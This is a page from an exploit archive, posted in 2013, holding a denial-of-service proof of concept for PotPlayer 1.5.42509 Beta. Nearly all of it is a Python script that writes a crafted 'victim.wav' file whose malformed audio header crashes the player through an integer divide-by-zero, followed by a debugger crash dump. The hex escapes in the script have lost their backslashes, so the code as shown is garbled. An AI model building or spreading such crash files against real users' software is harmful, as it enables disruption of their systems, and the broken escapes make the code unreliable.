Home / exploitsPDF  

PotPlayer 1.5.42509 Beta Denial Of Service

Posted on 17 December 2013

########################################################### #[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero #Exploit) #[~] Author: sajith #[~] version: PotPlayer 1.5.42509 Beta #[~]Vendor Homepage: http://daumpotplayer.com/ #[~] Tested in: Windows XP SP3 #[~] vulnerable app link:http://daumpotplayer.com/download/ ########################################################### #POC: #------- #!/usr/bin/python raw_input("Hit Enter to create a malicious file") f = open("victim.wav","w") header=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22" "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00") f.write(header) print "[#] File created by sajith shetty" raw_input("Hit enter to exit") #----- ''' (694.4d8): Integer divide-by-zero - code c0000094 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff edi=0021977a eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 '''

 

TOP